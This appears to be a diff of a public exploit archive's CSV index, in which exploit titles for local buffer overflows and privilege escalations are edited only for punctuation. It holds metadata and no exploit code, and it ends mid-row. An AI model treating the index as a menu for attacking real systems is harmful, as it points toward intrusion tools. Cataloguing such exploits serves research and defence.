7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7677,platforms/multiple/local/7677.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)",2009-01-06,sh2kerr,multiple,local,0 -7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0 +7681,platforms/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments'",2009-01-06,"Paul Szabo",linux,local,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,windows,local,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 @@ -6380,7 +6385,7 @@ id,file,description,date,author,platform,type,port 8158,platforms/windows/local/8158.pl,"Winamp 5.541 - Skin Universal Buffer Overflow",2009-03-05,SkD,windows,local,0 8159,platforms/windows/local/8159.rb,"Media Commands - '.m3l' File Local Buffer Overflow",2009-03-05,Stack,windows,local,0 8162,platforms/windows/local/8162.py,"Media Commands - '.m3u' Universal Overwrite (SEH)",2009-03-05,His0k4,windows,local,0 -8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - (Playlist) Universal Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 +8171,platforms/windows/local/8171.py,"Nokia MultiMedia Player 1.0 - Playlist Universal Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8174,platforms/windows/local/8174.py,"Realtek Sound Manager 1.15.0.0 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 8175,platforms/windows/local/8175.txt,"mks_vir 9b < 1.2.0.0b297 - 'mksmonen.sys' Privilege Escalation",2009-03-09,"NT Internals",windows,local,0 8176,platforms/windows/local/8176.py,"EO Video 1.36 - Playlist Overwrite (SEH)",2009-03-09,His0k4,windows,local,0 @@ -6388,7 +6393,7 @@ id,file,description,date,author,platform,type,port 8178,platforms/windows/local/8178.pl,"Mediacoder 0.6.2.4275 - '.m3u' Universal Stack Overflow",2009-03-09,Stack,windows,local,0 8179,platforms/windows/local/8179.rb,"Mediacoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,windows,local,0 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 -8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (Playlist) Universal Overwrite (SEH)",2009-03-10,His0k4,windows,local,0 +8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,windows,local,0 8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow (Universal)",2009-03-13,SkD,windows,local,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,windows,local,0 @@ -6401,15 +6406,15 @@ id,file,description,date,author,platform,type,port 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0 -8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 -8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 +8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 +8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,windows,local,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow",2009-03-27,Encrypt3d.M!nd,windows,local,0 -8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0 +8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - 'hhp' Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Privilege Escalation",2009-03-29,"Jon Oberheide",linux,local,0 8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,local,0 8312,platforms/windows/local/8312.py,"AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0 @@ -6417,7 +6422,7 @@ id,file,description,date,author,platform,type,port 8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow",2009-04-03,SkD,windows,local,0 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 - 'exit_notify()' Privilege Escalation",2009-04-08,gat3way,linux,local,0 8371,platforms/windows/local/8371.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow",2009-04-08,AlpHaNiX,windows,local,0 -8401,platforms/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - (html) Local Overwrite (SEH)",2009-04-13,dun,windows,local,0 +8401,platforms/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - html Local Overwrite (SEH)",2009-04-13,dun,windows,local,0 8410,platforms/windows/local/8410.pl,"RM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8411,platforms/windows/local/8411.c,"WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8412,platforms/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 @@ -6432,7 +6437,7 @@ id,file,description,date,author,platform,type,port 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Privilege Escalation (1)",2009-04-20,kingcope,linux,local,0 8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Buffer Overflow (1)",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - '.m3u' Buffer Overflow (2)",2009-04-22,His0k4,windows,local,0 -8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow",2009-04-23,Stack,windows,local,0 +8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - 'Skin' Buffer Overflow",2009-04-23,Stack,windows,local,0 8534,platforms/linux/local/8534.c,"libvirt_proxy 0.5.1 - Privilege Escalation",2009-04-27,"Jon Oberheide",linux,local,0 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow",2009-04-27,G4N0K,windows,local,0 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)",2009-04-27,His0k4,windows,local,0 @@ -6472,12 +6477,12 @@ id,file,description,date,author,platform,type,port 8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation",2009-05-14,prdelka,linux,local,0 8698,platforms/windows/local/8698.pl,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow",2009-05-15,hack4love,windows,local,0 8701,platforms/windows/local/8701.py,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)",2009-05-15,His0k4,windows,local,0 -8770,platforms/windows/local/8770.py,"Winamp 5.55 - (MAKI script) Universal Overwrite (SEH)",2009-05-22,His0k4,windows,local,0 -8772,platforms/windows/local/8772.pl,"Winamp 5.55 - (MAKI script) Universal Integer Overflow",2009-05-22,Encrypt3d.M!nd,windows,local,0 +8770,platforms/windows/local/8770.py,"Winamp 5.55 - MAKI Script Universal Overwrite (SEH)",2009-05-22,His0k4,windows,local,0 +8772,platforms/windows/local/8772.pl,"Winamp 5.55 - MAKI script Universal Integer Overflow",2009-05-22,Encrypt3d.M!nd,windows,local,0 8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0 8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0 8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0 -8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0 +8789,platforms/windows/local/8789.py,"Slayer 2.4 - 'skin' Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0 8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass",2009-05-26,Abysssec,win_x86,local,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow (PoC) (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 @@ -6487,7 +6492,7 @@ id,file,description,date,author,platform,type,port 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - 'dlpcrypt.sys' Local Kernel Ring0 Code Execution",2009-06-18,mu-b,windows,local,0 9034,platforms/windows/local/9034.pl,"HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)",2009-06-29,hack4love,windows,local,0 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0 -9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 - (m3u/ppl) Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 +9047,platforms/windows/local/9047.pl,"TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",windows,local,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0 @@ -6584,7 +6589,7 @@ id,file,description,date,author,platform,type,port 9589,platforms/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)",2009-09-04,hack4love,windows,local,0 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 - '.html' File Handling Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",linux,local,0 9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2)",2009-09-09,"Ramon Valle",linux,local,0 -9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0 +9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0 9610,platforms/windows/local/9610.py,"Audio Lib Player - '.m3u' Buffer Overflow (SEH)",2009-09-09,blake,windows,local,0 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflows (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local,0 @@ -6611,7 +6616,7 @@ id,file,description,date,author,platform,type,port 9882,platforms/windows/local/9882.txt,"Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0 9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - '.m3u' Buffer Overflow",2009-10-15,dellnull,windows,local,0 -9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) Buffer Overflow",2009-10-14,dellnull,windows,local,0 +9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - 'mpf' Buffer Overflow",2009-10-14,dellnull,windows,local,0 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,bellick,windows,local,0 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 @@ -6640,7 +6645,7 @@ id,file,description,date,author,platform,type,port 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0 -10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow",2009-11-28,Molotov,windows,local,0 +10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - 'pls' Buffer Overflow",2009-11-28,Molotov,windows,local,0 10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 10255,platforms/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Privilege Escalation",2009-11-30,kingcope,bsd,local,0 10264,platforms/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -6658,7 +6663,7 @@ id,file,description,date,author,platform,type,port 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0 10321,platforms/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0 -10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 +10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - hhp Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10332,platforms/windows/local/10332.rb,"PointDev IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 @@ -6733,7 +6738,7 @@ id,file,description,date,author,platform,type,port 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0 11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit (SEH)",2010-01-26,TecR0c,windows,local,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0 -11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0 +11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - Password field Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation",2010-02-02,anonymous,windows,local,0 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 - Reversible Encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 @@ -6794,7 +6799,7 @@ id,file,description,date,author,platform,type,port 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)",2010-04-16,blake,windows,local,0 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0 -12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 +12293,platforms/windows/local/12293.py,"TweakFS 1.0 - FSX Edition Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0 12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' File (SEH)",2010-04-24,"TecR0c and Sud0",windows,local,0 @@ -6963,7 +6968,7 @@ id,file,description,date,author,platform,type,port 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode (SEH)",2010-09-29,"Abhishek Lyall",windows,local,0 -15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - (SafeSEH + SEHOP) Exploit",2010-10-02,x90c,windows,local,0 +15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 - SafeSEH + SEHOP Exploit",2010-10-02,x90c,windows,local,0 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 @@ -6973,7 +6978,7 @@ id,file,description,date,author,platform,type,port 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0 -15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local,0 +15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local,0 15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0 15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0 15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0 @@ -6998,7 +7003,7 @@ id,file,description,date,author,platform,type,port 15589,platforms/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,windows,local,0 15620,platforms/linux/local/15620.sh,"SystemTap - Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local,0 15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - 'KmxSbx.sys' Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",windows,local,0 -15626,platforms/windows/local/15626.py,"OtsTurntables 1.00.048 - (m3u/ofl) Local Buffer Overflow (SEH)",2010-11-28,0v3r,windows,local,0 +15626,platforms/windows/local/15626.py,"OtsTurntables 1.00.048 - '.m3u'/'.ofl' Local Buffer Overflow (SEH)",2010-11-28,0v3r,windows,local,0 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow (SEH)",2010-11-29,0v3r,windows,local,0 15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 @@ -7045,7 +7050,7 @@ id,file,description,date,author,platform,type,port 16083,platforms/windows/local/16083.rb,"NetZip - Classic Buffer Overflow (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0 16085,platforms/windows/local/16085.py,"AOL 9.5 - '.rtx' Local Buffer Overflow",2011-01-31,sup3r,windows,local,0 16086,platforms/linux/local/16086.txt,"OpenVAS Manager - Command Injection",2011-01-31,"Tim Brown",linux,local,0 -16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow",2011-02-01,sup3r,windows,local,0 +16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - 'cbp' Buffer Overflow",2011-02-01,sup3r,windows,local,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0 @@ -7066,7 +7071,7 @@ id,file,description,date,author,platform,type,port 16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0 -16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 +16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - '.ASX' Filename Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0 @@ -7284,7 +7289,7 @@ id,file,description,date,author,platform,type,port 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local,0 -18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0 +18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass",2012-04-03,b33f,windows,local,0 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Privilege Escalation",2012-04-12,anonymous,linux,local,0 @@ -7628,8 +7633,8 @@ id,file,description,date,author,platform,type,port 19968,platforms/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 - Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 19969,platforms/linux/local/19969.c,"Mandriva Linux Mandrake 7.0 - Buffer Overflow",2000-05-29,noir,linux,local,0 19970,platforms/linux/local/19970.c,"KDE 1.1/1.1.1/1.1.2/1.2 - kdesud DISPLAY Environment Variable Overflow",2000-05-27,noir,linux,local,0 -19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 -19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - (ELM) Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 +19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0 +19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX - ELM Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0 19979,platforms/linux/local/19979.pl,"KDE 1.1.2 KApplication configfile - Exploit (1)",2000-05-31,kil3r,linux,local,0 19980,platforms/linux/local/19980.pl,"KDE 1.1.2 KApplication configfile - Exploit (2)",2000-05-31,kil3r,linux,local,0 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0 @@ -7639,8 +7644,8 @@ id,file,description,date,author,platform,type,port 19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0 -20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0 -20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)",2000-06-07,"Wojciech Purczynski",linux,local,0 +20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 